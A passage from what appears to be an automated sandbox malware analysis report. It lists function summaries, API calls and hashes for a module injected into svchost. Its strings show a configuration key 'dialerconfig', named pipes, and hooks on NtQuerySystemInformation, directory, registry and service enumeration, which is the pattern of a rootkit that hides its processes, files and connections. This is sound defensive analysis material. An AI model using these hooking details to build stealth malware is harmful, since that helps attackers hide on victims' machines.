                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1805
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1820
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1840
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD185B
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD187B
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1896
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD18A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: b0c894f7784fe93fd5e4d912c2eb019049ba366880ae2a28af5649d789d49e3d
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 94312571389B0161FB509BE2D6D37F9939AA744BCAF0464218E0FC7296FF17C451C290

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: dialer
                                                                      • API String ID: 0-3528709123
                                                                      • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction ID: 6c3c39336d40b37e6c8cf9515fa28cbcf7c24992cf0487896dc8f09ec8df4234
                                                                      • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction Fuzzy Hash: 7CD05E703953059AFB159FEA88C6EF02351AB08B9AF888024890A81251EB5BC99DD750

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: 18b38bb5507917fa2352624df611951c3bb57cdfa5d1b2d23385e643455212a1
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: E4614732B8539087EB14CF948081BBD739AFB54B99F548131DE0E53785DB7AD852C784

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 79a09f8f3720bc5273b010d1f356e68a70ec6752ccfd98b3c301455b28cdac55
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 4BB16B32258B9096FB698FE5D482BF963AAF744B8AF045016DE0F93794DB37D841C380
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: 03cf5bd3c19122581734986f2c10f6d311e666521bfd68b1f6af84beb660f4f4
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: F6319E72248B809AFB608FE0E881BED7365F785709F44402ADA4F87B94EF3AC549C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: a64a8fafea4748a103742ffd9067c0c0469601ae63dc2b93c66a8a842f97a94b
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: 67319332258F809AEB60CFA5E8817EE73A1F789759F540115EA9E83B54DF3AC145CB40

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: 19dde69792006792dc4b80681f5feac67894e51617c30498e9630f35d049b7da
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: 7A713936758B1099FB119FE5E8D2AA96365F784B8EF006111DA4F87B29DF37C544C380

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 4748ce0690830c0898785a435476f9b8f0d028ed3fb3b1bc3ab9656b80b8c298
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: 96516E32248B84CAF755CFE2E4857AAB7A1F789B9AF044124DA4E47719DF3EC045CB40

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: e634467b1f32646224c8287f2fc796e93386f02fba06a326c16b56ff7ceecbf6
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: A6318474589B8AA4FA05DBE9E8D3EF46326A70434EF845013941F86166AFBBC24DC3D0

                                                                      Control-flow Graph

                                                                      [Control-flow graph rendering omitted: the serialized node/edge list for the function at 1cbd8ba6910 (executed/not-executed colouring) is not reproduced here. Named nodes in the graph: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 07fdd0c7d24b3d781066f053deca9409dd143e813ed5482003d316b44598c601
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 7881D3B178C7018AFA909BE594C3BF92290EB5678EF4440159A4FC3796DBBBC845C788

                                                                      Control-flow Graph

                                                                      [Control-flow graph rendering omitted: the serialized node/edge list for the function at 1cbd8bdce28 (executed/not-executed colouring) is not reproduced here. API calls appearing in the graph nodes: GetLastError, FlsGetValue, FlsSetValue, SetLastError.]
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000001CBD8BDCE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCEBC
                                                                      • SetLastError.KERNEL32 ref: 000001CBD8BDCED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000001CBD8BDECCC,?,?,?,?,000001CBD8BDBF9F,?,?,?,?,?,000001CBD8BD7AB0), ref: 000001CBD8BDCF2C
                                                                        • Part of subcall function 000001CBD8BDD6CC: HeapAlloc.KERNEL32 ref: 000001CBD8BDD721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF54
                                                                        • Part of subcall function 000001CBD8BDD744: HeapFree.KERNEL32 ref: 000001CBD8BDD75A
                                                                        • Part of subcall function 000001CBD8BDD744: GetLastError.KERNEL32 ref: 000001CBD8BDD764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: 380e374fd0efe43d558c039f956dcbd27f9d5249dad7ecb7c9ae31faf30a61ac
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: 06413C702CD34462F96967F595E3BF922539B447AEF141B24A83FC67E6EB2BD401C280

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: 8d495f9292460a9735da5ed95210fda6fbe957da3286c33244c8f36ea02638a3
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: 52219032258B508AF710CBA4E4857A963A1F3857AAF400215DA5E82BA8CF3EC149CB40

                                                                      Control-flow Graph

                                                                      [Control-flow graph rendering omitted: the serialized node/edge list for the function at 1cbd8bda544 (executed/not-executed colouring) is not reproduced here; its nodes reference only internal subroutine addresses.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: f93e4a1daa0d78cdaddb0cd674ab4af90492db7ec0da77687cb0fc27551b55aa
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 2DE18D72648B40AAFB209FE59482BED77A2F74479DF141115DE8F97B96CB3AC081C780

                                                                      Control-flow Graph

                                                                      [Control-flow graph rendering omitted: the serialized node/edge list for the function at 1cbd8ba9944 (executed/not-executed colouring) is not reproduced here; its nodes reference only internal subroutine addresses.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: a62b4a5be1d7a59fcf86fd4f7d53b3e4fe5156bf132faf2773fff64dd797c087
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: 49E19C32648B408AFB608BE5D482BFD37A0F745B8DF100106EE9E87B96CB76C094C784

                                                                      Control-flow Graph

                                                                      [Control-flow graph rendering omitted: the serialized node/edge list for the function at 1cbd8bdf394 (executed/not-executed colouring) is not reproduced here. API calls appearing in the graph nodes: LoadLibraryExW, GetLastError, GetProcAddress, FreeLibrary.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: 32bd6cb2b4fe6735583b648f74334685912bda2f5fa339ee11d04b3235dc61ab
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 3041133239DB01A5FA12CBD6A881BF52792FB45BAAF0441258D0FD7795EB3BC405C380
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: 066eb5fd8941bfc650680b4864ba2459917eed432ccf800f44e515a7831a054b
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: 6D419033218B80DAE761CFA1E4857AFB7A1F389B99F049119DA8E47758DF3AC445CB40
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 71d4662aedf6dbd697b56d36903d8f4ddc6a5a38ef4483e9cb1097fa8a6fd393
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 8311933038D34052FA6457F599D3BF92243DB843A9F185624586FC67E5DF1BC401C280
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 0106aeadf5537429d751d842193ee5b2217affcef9ad2f21424a8c74e39b0775
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: EE8105B068C701AAFA519BE594C3FF92692E74578EF144425990FC7796EB3BC403C788
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: c9b8f5ea63e900bb7e76ad3c81d051b3b44ab0de19cb25040923075a332a8adb
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: A731F63124A700F6FE169BC2A481BF522D5B748BAAF1906259D2F87791DF3BC459C380
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: eb7377fe2b6302bf55bf176071237aa04aac1f273150e96e86d659a293cea9b9
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: 5D115131258B408AF7528BD2E895B6977A0F789FEAF044214EA6FC7794CB3BC514C780
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: 59217231f7a3652f0728cb9fcaba971148e9c2b568802b1bfc5c67614d1d01f2
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: D111AC36748B408AFF158BD1E085AA962A1F789B8AF040028DE8F87756EF3FC504C744
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: 2535d574b1785d2b1a42f984cfa41e71c2a54c3512dbc8327d59fc37f128c4a0
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: 93D1BE76249B4891EA70DB86E4917AE77B1F388B89F100116EACF87B65CF7EC541CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 1cba4eec41f719f4423791475f4ed57158e1c05105fd208c51b5bbf463187363
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 77311532349B5096F611CFD6E581BBA6395FB44B8AF0844209E4F83B5AEF37D460C380
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 537801d7384df499510b0516e733ebe0744c8f24ed2dd7c99d327c711a9b615e
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: B2116F3028D34062FA2557F195D3BF92253AB847BEF141724A86FC67E6DF2BC401C280
                                                                      APIs
                                                                      Memory Dump Source
